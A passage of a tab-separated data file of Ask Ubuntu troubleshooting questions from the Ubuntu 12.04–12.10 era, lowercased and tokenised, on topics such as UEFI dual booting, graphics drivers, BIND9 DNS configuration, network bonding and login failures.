to delete but apparently i lose warranty if i do that . grazie/thanks you
254126	ubuntu wifi makes ipad wifi very slow	i 'm working on ubuntu 12.04 . since one week , the wifi of the ipad is very slow when the wifi of the ubuntu is active . if i use a ethernet cable everything is ok . both are working with dhcp any idea ?
254127	upgrade to 12.04.2 and all *-quantal packages	i have ubuntu 12.04 installed and upgraded . i noticed lots of packages with -quantal suffix ( kernel , xorg stack , drivers , etc . ) , which is included in 12.04.2 upgrade . how to easily upgrade all of my installed packages to *-quantal equivalent ?
254128	how can get 3d mode in unity working again ?	i 'm using ubuntu 12.04 ( 64-bit kernel linux 3.2.0-38-generic gnome 3.4.2 ) on a intel i5-2400 . unity has always run in 3d mode . after ubuntu installed updates , it started freezing after login . so i ran the recovery mode to fix broken packages . ubuntu is running again but now unity is in 2d mode . i have tried to reinstall xserver and graphic drivers but nothing is fixing my problem . it 's already saying that i 'm using the lastest xserver-xorg-video-intel version . /usr/lib/nux/unity_support_test -p opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x301 ) opengl version string : 2.1 mesa 9.0 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no does anyone have an idea on how to get 3d mode working again ?
254129	how to display all apt-get dpkg : :options and there current values ?	there is apt-get -o dpkg : :options : := '' -- force-confnew '' or apt-get -o dpkg : :options : := '' -- force-confold '' and many more . how can i get a list of all dpkg : :options and there current set values ?
254133	how to mount external drive directly under `` /media/ '' and not under `` /media/username/ '' ?	i have been facing a new and annoying problem after installing apache2 on my new 12.10 distribution . i have done this at least 20 times before with older distributions and had no problems up until now . the partition on my external drive is named ext4 . until now it was mounted as : /media/ext4 and was perfectly functioning when i changed documentroot in sites-available to read : documentroot /media/ext4/www in my ubuntu 12.10 distribution it is mounted as : /media/username/ext4 which seems unreadable by apache . i gathered if i somehow force ubuntu to do as before ( mount at /media/ext4 ) it might work . i 've already tried everything else , such as chmod , chgrp and chown . manifestation of the problem : localhost/index.php returns a 403 error . any help would be appreciated !
254134	is possible to back up files to two different hard disks at the same time ?	is there any way using the luckybackup application to backup the same directories and files to two different usb hard disks in the same task , instead of adding two different tasks ? it will speed up a lot my backups .
254137	/etc/apt/apt.conf.d/ priority - overrule configuration file ?	the folder /etc/apt/apt.conf.d/ contains lots of files . 01autoremove 10periodic 15update-stamp 20archive 20dbus 20packagekit 50unattended-upgrades 70debconf 99synaptic 99update-notifier what are those 01 , 10 , ... , 99 numbers all about ? do they imply `` read 01 first , read 99 last and let 99 overrule settings made in earlier numbers '' ? let 's for example say there is only one setting in 50unattended-upgrades , where i want to overrule the default setting with my own preference . i could edit 50unattended-upgrades directly , but then it becomes messy if the maintainer updates that file - i have to merge the changes . could i also create 51unattended-upgrades with just the single value i prefer and therefore overrule the default in 50unattended-upgrades ?
254138	why i do n't receive update notifications	i was previous a kubuntu user but installed ubuntu 12.04 lts for a week now and i always need to open update manager manually and search . if they 're are any updates , because i do n't get any notifications , i tried reinstalling update-manager and update-notifier and still no updates notifications . on kubuntu i always received update notifications after most 1 minute after i start my pc . why is that and how can i fix it ?
254139	how do i fix a error on a failed module build for virtualbox ?	world . i 'm trying to upgrade my system but i get the error : error ! bad return status for module build on kernel : 3.2.0-37-generic ( i686 ) deleting module version : 4.1.12 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . loading new virtualbox-4.1.12 dkms files ... first installation : checking all kernels ... building only for 3.2.0-37-generic building initial module for 3.2.0-37-generic error ! bad return status for module build on kernel : 3.2.0-37-generic ( i686 ) consult /var/lib/dkms/virtualbox/4.1.12/build/make.log for more information . dpkg : error processing virtualbox-dkms ( -- configure ) : subprocess installed post-installation script returned error exit status 10 errors were encountered while processing : virtualbox-dkms e : sub-process /usr/bin/dpkg returned an error code ( 1 )
254140	disable usb device : usb2.0-crw ( generic )	i have a problem with card reader in my notebook with ubuntu 12.10 . it 's usage is always at 100 % and powertop shows it 's power consumption as 16w or even more ( which is really really way too much for a card reader ) . this is the line from the powertop : 16.7 w 100.0 % usb device : usb2.0-crw ( generic ) how can i reduce wakeups or disable this card reader ? ( i do n't use the card reader very much )
254142	gigolo/gnome password safety	i was proposed to save a password in gnome-shell @ 12.04 using gigolo : where exactly are these passwords saved and how are they encrypted ?
254146	how do i get my ubuntu laptop 's display on the ubuntu desktop connected to the network ?	my network consists of an ubuntu laptop and an ubuntu desktop connected via a router . now , i want to work on my laptop and see the output on the desktop screen , through the network . how do i achieve this ? thanks .
254147	are there any tutorials available which would help me learn the concepts of mobile development ?	right now i am working on asp & c # .net . i am also interested in mobile app development and want to start with ubuntu mobile development using c # .net . are there any tutorials available which would help me learn the concepts of mobile development ?
254148	how can i uninstall ubuntu when installed through windows 7 ?	i installed ubuntu without doing a partition , i ran the .exe from my windows 7 os . for the past week i 've been trying to uninstall ubuntu unsuccesfully . i went to the windows 7 control panel to uninstall ubuntu and the file was deleted from my c drive and there is no ubuntu partition under the disk management , however when i boot up ubuntu is still running and works perfectly . i 'm at my wits end .
254149	amd/ati driver boots with no unity/gui display 12.10	i 've just installed ubuntu 12.10 64 '' ready to play some steam games . the install went fine i did all the updates etc , however i need to install the proprietary amd drivers ( ati hd5750 ) for any decent performance , so i go to the software sources and tick the driver listed . when i reboot i get my desktop picture and mouse but no unity whatsoever , i can right click the desktop etc but i have no side launcher or top bar . i 've had to re-install totally twice now to try and fix it but still the same each time . any help will as always be much appreciated . cheers
254155	'operating system not found'while installing ubuntu 12.10 along with windows 8	i tried to install ubuntu 12.10 along with windows 8 64bit from usb stick in a brand new sony vaio but now i get a black screen with the message : operating system not found ' . i ca n't get into windows 8 , neither into ubuntu . i saw this answer http : //askubuntu.com/questions/221835/installing-ubuntu-on-a-pre-installed-uefi-supported-windows-8-system ? lq=1 but i did it on a wrong way i did these steps : i made a partition 20 gb i restarted the laptop from settings- > general- > troobleshoot- > uefi settings- > i selected 'boot from usb' and then installed ubuntu 12.10 . installation went ok until i was asked to restart computer . i did so , and i had 4 choices ( ubuntu , windows recovery or something like that , windows 8 , system ( i do n't really remember exactly ) ) . i selected ubuntu but i got a flashing screen i tried windows 8 but did n't work then i selected system and got into bios i disabled the secure boot , and also turned the uefi mode to legacy . saved the changes , after that i got a black screen with the message `` operating system not found '' . whatever i type i get the same message . i ca n't get into windows , neither in ubuntu . what can i do ; i think i have to get back into bios but do n't know how .
254156	how to install with wubi when it says `` could not retrieve the required disk image files '' ?	i tried to install ubuntu 12.10 with the wubi installer while running windows , because my pc does not accept my bootcd as a bootable medium . but wubi showed me this error : ubuntu-installationsprogramm ( x ) ein fehler ist aufgetreten : could not retrieve the required disk image files weiter informationen finden sie in der protokolldatei : c : \users\username\appdata\local\temp\wubi-12.10-rev273.log what can i do , because i want to get rid of my windows 7 and use the way better ubuntu 12.10 ? thanks for your huge answer , now my next problem after trying to install wubi with the .iso is , that the same error shows up again and i am not shure which part of the errorreport you need . can you tell me ? because i 'm not that good at linux .
254159	laptop display is not detected	i have a laptop with hybrid video system - intel+amd 7700hd and an external monitor connected by hdmi . my laptop display is not detected until i unplug and plug in back hdmi cable , the same issue on both intel and amd video adapters . i installed the latest proprietary video driver from amd.com . i try to not shut down my laptop , try to use sleep or hibernation , but still it is very annoying .
254164	complete removal of mediatomb	i recently changed to minidlna as my main dlna server , however i tried removing mediatom via the normal ways ( apt-get remove ... ) and i still get : [ 33.926615 ] init : mediatomb main process ( 1340 ) terminated with status 1 [ 33.975586 ] init : mediatomb main process ended , respawning how do i get rid of this permanently ? j
254171	how do i access the file system as a root or owner ?	i need to add online store configuration files in file system var/www . but i ca n't access the file system , because it says that only owner can access it , the owner is root . so , how can i access those files ? or is it possible for me to use my file system as a owner ? i need to create a directory named ubuntu in var/www and store my online store configuration files .
254174	how to boot usb in uefi mode ?	we recently bought a new windows 8 laptop , and we are trying to install ubuntu to it in a dual boot configuration . i downloaded the 64 bit 12.10 iso and put it in a usb stick , both with the utility recommended from the ubuntu installation guide and with unetbootin . however , when i reboot the laptop and select from bios the usb as first option , it just flashes the toshiba logo for 2 seconds and then reboots again and does this ad infinitum ( i disabled secureboot ) until i remove the usb stick and then it boots normally into windows . if i however turn on the option csm/legacy boot in the bios i can boot into the usb installer , so i do n't think it is an issue with the usb stick nor the iso image . the question is , how do i get it to boot in uefi mode ? or should i just keep going in legacy mode and hope the installer recognizes the uefi boot ?
254180	kubuntu : display avatar in lightdm	lightdm is n't displaying my avatar when i try to login ( i changed it in kde control center ) would it work if i used gnome control center for user management ?
254184	how to run same query on multiple servers via the jump server	i have many servers like sdeuu1 , sdeuu2 , sdeuu3 , .. etc . i want to run a query on each one of them and the query is : grep -i 'sponsoredlinksiframe.jsp ' /home/nextag/httpd_logs/access_log.1360* | grep -ic 'nextag.co.uk' this query is returning perfect results when ran on separate servers . now i have one server named sdalp1 through which i can ssh to sdeuu1 , 2 , 3 etc.. and go to that server to run the query . now instead of doing that i want to run the query from sdalp1 for all the sdeuu servers in one go and i tried the following command and a few other versions of it : for i in sdeuu1 sdeuu2 sdeuu3 sdeuu4 sdeuu5 \ sdeuu6 sdeuu7 sdeuu8 sdeuu9 sdeuu10 \ sdeuu11 sdeuu12 sdeuu13 sdeuu14 sdeuu15 \ sdeuu16 sdeuu17 sdeuu18 ; do grep -i 'sponsoredlinksiframe.jsp ' /home/nextag/httpd_logs/access_log.1360* | grep -ic 'nextag.co.uk ' '' echo $ i done but this command is returning an error for all servers as follows : -bash : grep -i 'sponsoredlinksiframe.jsp ' /home/nextag/httpd_logs/access_log.1360* | grep -ic 'nextag.co.uk ' : no such file or directory what is the problem here , i am not getting if this is an issue with permissions ?
254189	can not boot ubuntu cd on uefi new laptop ( toshiba satellite l850 ) ?	i am trying to install ubuntu 12.10 on a new laptop coming with windows 8 . i have read that only 64 bits are compatible with uefi , so i tried the 32 bit and now the 64 bit . i disable the secure boot from bios , but still got the message `` check media [ fail ] '' . the cd ( actually , physically a dvd ) boot ok from other laptops or if i set the boot method to non-uefi ( but then windows does n't - and that 's my office laptop ) . any solution ? is it a bug or i lost some info ? thanks , antonello
254190	ubuntu 12.04 wont start after manual restart	i 've been using ubuntu 12.04 with no problems for the past 2 months . a few hours ago , when i restarted my pc , it just hanged with black screen for more than 10 minutes . so i did a hard reset by pressing the power button for a few seconds . however , when i now start the pc , ubuntu loads till the ubuntu logo with 5 dots under it , then remains there forever . tried several times with same result . i tried boot-repair recommended repair , but it did n't solve the problem . here 's the url it gave to ask people for help . paste.ubuntu.com/1639118/
254191	how to change the default view of folders to detailed view	is it possible to set default view of all folders to detailed view or list view , instead of doing it every single time and yeah , i am new to ubuntu
254194	preventing clickthrough when using raise on click	i 'm running 12.04 with raise on click enabled . however , the click that raises the window is also passed through to the window itself , meaning a window that has no inert areas visible can not be raised without causing something to happen . i 'm used to os x 's behaviour of not passing the click-to-raise through to the window ( except when it has a relatively innocuous action , but i can live without that exception ) . that is , clicking on a window that is not at the front just raises it ; if the window was already at the front , the click is passed to the window and acted on in the normal way . is this possible with ubuntu ? ( this is a standard 12.04 install , so unity+compiz )
254199	how to fix `` the process for the trash protocol died unexpectedly '' ?	since yesterday i got the following message after login to kde : the process for the trash protocol died unexpectedly does anybody know what causes this problem and how to fix ? kde version : 4.9.5 from kubuntu-ppa thanx in advance .
254200	update-alternatives : `` alternative path does n't exist '' issue while updating jdk7	i decided to update my jdk7 to recent version from here . corresponding x64 tag.gz archive for my architecture has been downloaded and extracted to /usr/lib/jvm as usual . all previous versions of java were installed before the same way . but before setting new alternatives for java , javac and javaws i removed all existing alternatives using the following commands : sudo update-alternatives -- remove-all java sudo update-alternatives -- remove-all javac sudo update-alternatives -- remove-all javaws now when trying to install new alternatives i get the following : sudo update-alternatives -- install /usr/lib/jvm/jdk1.7.0_13/bin/java java /usr/bin/java 1 update-alternatives : error : alternative path /usr/bin/java does n't exist . of course , /usr/bin/java does n't exist but /usr/bin does ? what 's wrong with it and how can i fix it ?
254201	dual monitor flickers and resets periodically	i have a lenovo thinkpad t530 with ubuntu 12.10 installed . when i connect an external monitor ( acer 23 ' ) to my laptop it works fine , but both screens flicker periodically and gets reset . the applications opened in the external monitor moves to the laptop screen when reset . is this a problem with the graphics card driver ? is there a solution for this problem ? thanks
254211	ubuntu 12.04 and bind9 not responding to queries	i 'm trying to set up an authoritative dns server with bind9 ( 9.8.1-p1 ) on ubuntu 12.04.2 lts ( upgraded from ubuntu 11.04 ) and i am encountering some problems . external problem when trying to check my dns configuration with the following tools solvedns.com/biotechnics.ro and dnscheck.pingdom.com/ ? domain=biotechnics.ro they fail with output messages like `` name server ns1.biotechnics.ro ( 89.36.94.53 ) does not answer queries '' or `` your name server ns1.biotechnics.ro is not responding to ns record queries ! '' also , external online dig tools such as this give back the following output : ; < < > > dig 9.8.4-p1 < < > > @ ns1.biotechnics.ro -t ns biotechnics.ro ; ( 1 server found ) ; ; global options : +cmd ; ; connection timed out ; no servers could be reached primary tld from parent the parent is set up the following way : ; < < > > dig 9.8.4-p1 < < > > @ primary.rotld.ro -t ns biotechnics.ro ; ( 2 servers found ) ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 7740 ; ; flags : qr rd ; query : 1 , answer : 0 , authority : 2 , additional : 2 ; ; warning : recursion requested but not available ; ; question section : ; biotechnics.ro . in ns ; ; authority section : biotechnics.ro . 10800 in ns ns2.biotechnics.ro . biotechnics.ro . 10800 in ns ns1.biotechnics.ro . ; ; additional section : ns1.biotechnics.ro . 10800 in a 89.36.94.53 ns2.biotechnics.ro . 10800 in a 141.85.169.100 ; ; query time : 279 msec ; ; server : 192.162.16.18 # 53 ( 192.162.16.18 ) ; ; when : tue feb 12 05:40:50 2013 ; ; msg size rcvd : 100 configuration on ns1 rsavu @ host : /etc/bind $ head -40 named.conf // -- -- -- -- -- -- -- -- -- -- -- - options -- -- -- -- -- -- -- -- -- -- -- - options { // all relative paths use this directory as a base directory `` /var/cache/bind '' ; // version statement changed for security ( to avoid hacking known weaknesses ) version `` not currently available '' ; // this prevents bind from serving other than authoritative requests : recursion no ; // disables all zone transfer requests for performance as well as security reasons allow-transfer { none ; } ; dnssec-enable no ; // zone not signed minimal-responses yes ; // optional - improved performance additional-from-auth no ; // optional - improved performance additional-from-cache no ; // optional - minimal performance change } ; // -- -- -- -- -- -- -- -- -- -- -- - logging -- -- -- -- -- -- -- -- -- -- -- - // log to /var/log/named/zytrax-named all events from info up in severity ( no debug ) // uses 3 files in rotation swaps files when size reaches 250k // failure messages up to this point are in ( syslog ) /var/log/messages logging { channel custom_log { file `` /var/log/bind9_info.log '' versions 3 size 250k ; severity debug ; } ; category default { custom_log ; } ; } ; // -- -- -- -- -- -- -- -- -- -- -- - zones -- -- -- -- -- -- -- -- -- -- -- - zone `` biotechnics.ro '' in { type master ; file `` /etc/bind/db.biotechnics.ro '' ; allow-transfer { 141.85.169.100 ; } ; also-notify { 141.85.169.100 ; } ; allow-query { any ; } ; } ; zone file $ origin . $ ttl 36000 ; 10 hours biotechnics.ro in soa ns1.biotechnics.ro . admin.biotechnics.ro . ( 2013021201 ; serial 28800 ; refresh ( 8 hours ) 7200 ; retry ( 2 hours ) 604800 ; expire ( 1 week ) 86400 ; minimum ( 1 day ) ) ns ns1.biotechnics.ro . ns ns2.biotechnics.ro . a 81.181.152.23 $ origin biotechnics.ro . ftp a 81.181.152.23 ns1.biotechnics.ro . a 89.36.94.53 ns2.biotechnics.ro . a 141.85.169.100 www a 81.181.152.23 what i checked there is no problem with the firewall ( i disabled it for the moment ) dig from inside the hosts work dig from slave works putting recursion yes ; does n't solve the problem netstat shows that port 53 is in use on udp and tcp by named named-checkconf and named-checkzone issue no warning . what can be the problem ? any ideas ? i do n't understand what 's happening and why is n't my host replying to queries . [ later edit ] the slave is on debian 4.0 and works very well ( as you can see in the dns solvers above .
254212	why do n't hyperlinks open in evince document viewer ?	i am using evince document viewer as default in ubuntu 12.04 . how do i get a hyperlink to open when clicking on it ?
254213	why ca n't i easily open .py files with idle using right click ?	i have visited this question and tried everything mentioned with no success : how do i set idle as default editor for python scripts ubuntu 12.04 python 2.7 idle ( using python-2.7 ) when i right click a .py file : idle does not show up in the first menu ( the only option is gedit ) . idle does not show up in 'open with other application ... ' menu idle does not show up in 'show other applicatons ' menu i had found the solution to this problem online before , for a previous ubuntu 12.04 installation , but can not locate it again . i imagine this can be fixed through file associations ? additionally , idle windows do not possess an icon and show as a grey box with a ' ? ' .
254215	atheros ar9485 12.04 wifi problem not solved by hwcrypt	following a routine update to ubuntu 12.04 , my wireless no longer works - it is constantly seeking a connection but not accepting my password . this has been documented elsewhere , with a fix involving file creation : /etc/modprobe.d/ath9k.conf with contents : options ath9k nohwcrypt=1 followed by reboot . however , i have tried this fix with no success , and i ca n't find any other solutions . this using 12.04.1 32-bit on an acer d270-26dkk . can anyone help ?
254216	gnote synchronization	ubuntu one has shutdown tomboy synchronization . as a workaround , i have installed gnote and it works very well , but i need somewhere to sync my notes . i would like to have access to them not only from all my computers , but from my ( android ) nexus phone as well . are there any internet servers or other options for gnote sync ? edit : i 'm sorry for not being more precise in my question , english are not my first language . tomboy has been my favorite notes program for a long time . but after they shutdown , first the webinterface and then the u1 sync , i been looking for a replacement . trying to use gnote instead , might not be the solution for me at all . it is really just to find something that meets my needs and that work 's , gnote or tomboy works fine . ( and are not at some commercial company ) . on my nexus phone tomdroid has been giving me access to my tomboy notes .
254218	mozart-stdlib : depends : mozart ( > = 1.4.0 ) but it is not installable	on a fresh ubuntu 12.10 system i am trying to install the mozart ( http : //www.mozart-oz.org/ ) programming environment . unfortunately i got the following error message reporting missing dependencies . > > sudo apt-get -f install mozart mozart-doc mozart-stdlib reading package lists ... done building dependency tree reading state information ... done mozart-doc is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : mozart : i386 : depends : emacs23 : i386 or emacsen : i386 mozart-stdlib : depends : mozart ( > = 1.4.0 ) but it is not installable e : unable to correct problems , you have held broken packages . how can i fix this issue ? my sources.list file 's content ( not modified since fresh installation ) deb http : //fr.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal main restricted deb http : //fr.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb http : //fr.archive.ubuntu.com/ubuntu/ quantal universe deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal universe deb http : //fr.archive.ubuntu.com/ubuntu/ quantal-updates universe deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal-updates universe deb http : //fr.archive.ubuntu.com/ubuntu/ quantal multiverse deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal multiverse deb http : //fr.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb http : //fr.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //security.ubuntu.com/ubuntu quantal-security main restricted deb http : //security.ubuntu.com/ubuntu quantal-security universe deb-src http : //security.ubuntu.com/ubuntu quantal-security universe deb http : //security.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //security.ubuntu.com/ubuntu quantal-security multiverse deb http : //archive.canonical.com/ubuntu quantal partner deb-src http : //archive.canonical.com/ubuntu quantal partner deb http : //extras.ubuntu.com/ubuntu quantal main deb-src http : //extras.ubuntu.com/ubuntu quantal main
254220	there is no application installed for executable files	i 'm a new linux user . i bought 1 month ago a 64x laptop with windows 8 pre-installed . using unetbootin i installed ubuntu 12.10 and completely removed windows 8 . now , the new ubuntu version is a bit too heavy for my slow laptop , i therefor decided to try bodhi or fedora . like i did for installing ubuntu , i downloaded unetbootin for linux , and the bodhi image . i thought i could simply run unetbootin and follow the same steps as i did on windows , and then install bodhi ... but as i double click the downloaded unetbootin executable [ `` unetbootin-linux-583 '' ] it gives me the following error : could not display `` /home/laptop/desktop/unetbootin-linux-583 '' . there is no application installed for executable files . do you want to search for an application to open this file ? i searched before about the error , and found several times the tip to change the allow executing file as a program in the properties . i tried , and now if i double click , nothing happens at all .
254223	unable to mount filesystem as read-write in recovery mode	i deleted two unused user accounts . now i am unable to login even into my own account . i rebooted in recovery mode in the root shell and tried to restore the back-up of /etc/passwd . however , the filesystem is read-only ! ! i can only access root shell via recovery . can you help me ?
254229	terminal prompt is not changed when i log in as root ?	why is the terminal prompt unchanged when i log in as root ? i.e , my default prompt is 0|storm @ sky : ~ % , but when i log in as root , it 's something like ~ root ] # . how do i change that variable , and would it affect my other prompts ?
254232	should i use zimagez in xubuntu xfce to store my screenshots ?	xfce4-screenshooter is offering to upload your screenshots automatically to zimagez.com but how long will they keep your screenshots there ? see this article about the tool on webud8.org if it is not stored `` forever '' , it would be an unreliable way of sending someone your screenshot .
254233	compiz kde ubuntu 12.04 ca n't input text to programs and unable to move windows sometimes	well i finally managed to install kde with compiz on ubuntu 12.04 . now i have only a few problems left the biggest problem is that i can not input text into the kde start menu.. it does popup ( sometimes very buggy ( mirrored etc ) ) but.. when i type letters , those never show up . nor the cursor inside the text field.. in chrome it works.. after restarting the browser though.. but in the system applications it doesnt.. not even in the terminal.. also using alt-f2 to open that run thingy.. does not work either . also , using the application switcher ( alt-tab ) of compiz does work.. but when i do that it creates the same problem.. it makes windows `` unable to input '' so.. when i run chrome.. i can input text into chrome and select etc.. but when i use alt-tab to switch to another program and then go back to chrome.. i ca n't input text anymore.. sysinfo : emerald 0.95 , kde4 , ubuntu 12.04 kernel : 3.2.0-37-generic gfx : > fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6900 series opengl version string : 4.2.12002 compatibility profile context 9.012
254235	why is top breaking history-search-backward in bash ?	i have a line in my .bashrc the following line : bind ' '' \e [ a '' : history-search-backward' that causes that when i write `` abc '' to command prompt and press up arrow , bash searches in history only for commands that start with `` abc '' . all is fine until i run top ( and maybe some other applications that i am not sure about , with top , i am sure ) when this behaviour is reversed to normal search . however , when i run bind ' '' \e [ a '' : history-search-backward' in terminal , nothing changes and i have to kill and restart the terminal to get the old behaviour back . is there a way to reverse it ( or prevent it from happening ? ) this happens in gnome-terminal and xterm in unity and gnome shell . tty seems to be not affected . my -bashrc on top of stok ubuntu .bashrc is this : bind ' '' \e [ a '' : history-search-backward' bind ' '' \e [ b '' : history-search-forward' # that behaviour is for pageup and pagedown bind ' '' \e [ 5~ '' : previous-history' bind ' '' \e [ 6~ '' : next-history' # show possibilities if tab ambigious set show-all-if-ambiguous on # ignore case when completing , lets see how it works set completion-ignore-case on shopt -s cdspell histsize=10000 histcontrol=ignoredups histfilesize=10001 histtimeformat= '' % h/ % d - % h : % m : % s `` shopt -s histappend prompt_command= '' history -a ; history -c ; history -r ; $ prompt_command ''
254240	why do system sounds only play in mono ?	i 've attached a screenshot of pavucontrol . is there a way to have the system sounds play in stereo and not mono ? it seems when it 's set to mono , it only plays the sound out of my left speaker . music apps play just find in stereo , and i 'm able to adjust the l/r channels independently . i 'm on ubuntu 12.10 , 3.5.0-23-generic . thanks for any help !
254241	gnote / tomboy webdav connecting error	if i want to sync my notes with webdav server , i get the following error messages in gnote and tomboy : this synchronization addin is not supported on your computer . please make sure you have fuse and wdfs correctly installed and configured how can i set up fuse and wdfs ? there is also a reported bug on launchpad : tomboy notes cant sync with webdav , but i do n't know if it is a bug .
254246	can you sign in ( desktop 12.10 ) user via ssh ?	i am away from my ubuntu machine and was working on it via vnc . i had to sign out of a user account and i lost my ubuntu vnc connection . i am assuming the vnc server is not running since ubuntu is sitting at the sign in screen . i still have ssh access to the machine . i was wondering if it is possible to sign into a ( desktop ) user account via ssh so the vnc server will come back online ?
254247	can i install 12.10 on ainol novo7 venus ?	is it possible to install ubuntu on my ainol novo7 venus ? i do n't want any tablet-version of ubuntu , because i like ubuntu how it is and think there is no need for a tablet-version ( i know there is no tablet-version , but many questions after it ) . so i want to install full desktop-ubuntu 12.10 with unity and everything , but i want a dual-boot with my existing android installation . is that possible ? if so , how ? is 16gb enough for ubuntu or should i buy an extra sd-card for it ?
254250	removed repository still being showed in synaptic origin section	i 'm sure to have correctly purged a certaing ppa : it does n't anymore appear in sources.list nor in sources.list.d folder . it does n't even appear in synaptic 's repository list , but if i open the `` origin '' section , it is always there , with the full list of its packages ( all not installed , of course ) .
254253	why are ethtool wol settings reset on startup ?	i installed ethtool and ran ethtool -s eth1 wol g to allow my server ( ubuntu 12.04 ) to wake up on lan ( wol ) . this setting is for some reason reset every startup , so i added the above command to /etc/rc.local . but why is this setting reset on every startup ? is this a bug or is there a reason for this ?
254255	bonding + bridge : traffic passing through the wrong interface	i 'm using ubuntu server 12.04 , on a server with 6 nics , grouped in 2 bundles : eth0 and eth2 are bundled using bonding mode 1 , under interface name bond0 which has ip [ network ] .8 eth1 , eth3 , eth4 and eth5 are bundled using bonding mode 4 ( 802.3ad ) , under interface name bond1 bond1 will be used to connect vms to our network : it is bridged through br0 , which has ip [ network ] . now , when i ping [ network ] .5 from our network , everything seems to works , but our vms have no network access . after poking around for a while , i noticed that br0 's ip ( [ network ] .5 ) is associated with bond1 's mac address , i.e . : arping < [ network ] .5 > returns unicast reply from < [ network ] .5 > [ < bond0 's mac address > ] 0.710ms also , while i 'm pinging [ network ] .5 : tcpdump -i br0 icmp shows no icmp traffic , tcpdump -i bond1 show no traffic either , but tcpdump -i bond0 shows the icmp packets i 'm sending using ping . it 's pretty obvious that packets are sent down the wrong tube . my question here is : why is it so and how can i fix that ? here is the content of my /etc/network/interfaces file : # bond0 part : auto eth0 iface eth0 inet manual bond-master bond0 auto eth2 iface eth2 inet manual bond-master bond0 auto bond0 iface bond0 inet static address [ network ] .8 gateway [ network ] .254 netmask 255.255.254.0 # bonding mode 1 : bond-mode balance-rr bond-slaves none auto eth1 iface eth1 inet manual bond-master bond1 auto eth3 iface eth3 inet manual bond-master bond1 # bond1 and br0 part : auto eth4 iface eth4 inet manual bond-master bond1 auto eth5 iface eth5 inet manual bond-master bond1 auto bond1 iface bond1 inet manual # bonding mode 4 : bond-mode 802.3ad bond-slaves none bond-miimon 100 bond-downdelay 200 bond-updelay 200 bond_xmit_hash_policy layer2 bond_lacp_rate fast auto br0 iface br0 inet static address [ network ] .5 netmask 255.255.254.0 gateway [ network ] .254 bridge_ports bond1 bridge_maxwait 5 bridge_stp off bridge_fd 0 please note that : 802.3ad link aggregation has been configured on the swich side we have verified muliple times that the right ports are connected the same issue occurs on 2 servers with the exact same hardware+software configuration [ edit ] after several reboots , the opposite happens : bond0 is associated with bond1 's mac address . this seems to happen randomly . when it does , vms behind the bridge have access to our network and internet .
254256	error running cisco vpn client ubuntu 10.04 server . how to fix it ?	i 've been struggling to get cisco vpn working on an ubuntu 10.04.3 server with a 2.6.32-35-server kernel . i followed the lamnk.com tutorial . i installed my linux kernel sources this way apt-get source linux-image- $ ( uname -r ) after extracting i set the path of the linux sources to /usr/src/linux-source-2.6.32 during compilation it complained about : building modules , stage 2 . modpost 1 modules /bin/sh : scripts/mod/modpost : not found make [ 2 ] : *** [ __modpost ] error 127 make [ 1 ] : *** [ modules ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-source-2.6.32' make : *** [ default ] error 2 failed to make module `` cisco_ipsec.ko '' . so i run make modules_prepare from /usr/src/linux-source-2.6.32 to fix it . the installation completed successufully but /etc/init.d/vpnclient_init start complained : starting /opt/cisco-vpnclient/bin/vpnclient : insmod : error inserting '/lib/modules/2.6.32-35-server/ciscovpn/cisco_ipsec.ko ' : -1 invalid module format failed ( insmod ) doing moninfo returns : modinfo /lib/modules/2.6.32-35-server/ciscovpn/cisco_ipsec.ko filename : /lib/modules/2.6.32-35-server/ciscovpn/cisco_ipsec.ko license : proprietary depends : vermagic : 2.6.32.60+drm33.26 smp mod_unload modversions the vermagic and uname which is 2.6.32-35-server are differents now am stuck how to resolve it ? my options are : 1 : unistall cisco vpn and restart but how to ? 2 : fix the install but how to ? i need help , i will be extremely grateful if anybody can show some directions . thank you `
254258	suddenly , i ca n't login with correct password ( greeter & tty )	this might be a duplicate of other password related questions but it 's somehow eccentric . i have three accounts in my ubuntu 12.10 system ( one standard and two administrators ) . one of the administrator accounts is my main development account and suddenly before yesterday , it started to act weird ( since the latest updates - kernel and others : at the greeter stage , when i enter my password , it instantly returns 'incorrect password ' . it does not even check . ( n.b : the password is absolutely correct ) at tty , impossible to login , once i enter my login name and then the password , it instantly re-prompts me to enter the login name ... it feels like tha path to authenticate this account has been accidently locked or access-sealed . i logged in with my second admin account and changed the password for the troublesome account , but no luck , reverted the password back to its original value and set the account to auto-login . rebooted and then , indeed the account logged in . yet , the abonormality remains : i can not perform root privilege actions ( sudo & gksudo ) . once i enter my password , nothing happens . the only time when the password is accepted is when the screen is locked and that i am prompted to enter the password to unlock it . i checked the ownership of my home folder and it 's okay . i have no clue why this is happening . some help is very appreciated . *i provide some logs ( dmesg , /var/log/auth.log ... etc ) here : * http : //unix.stackexchange.com/questions/64545/suddenly-i-cant-login-with-correct-password-greeter-tty
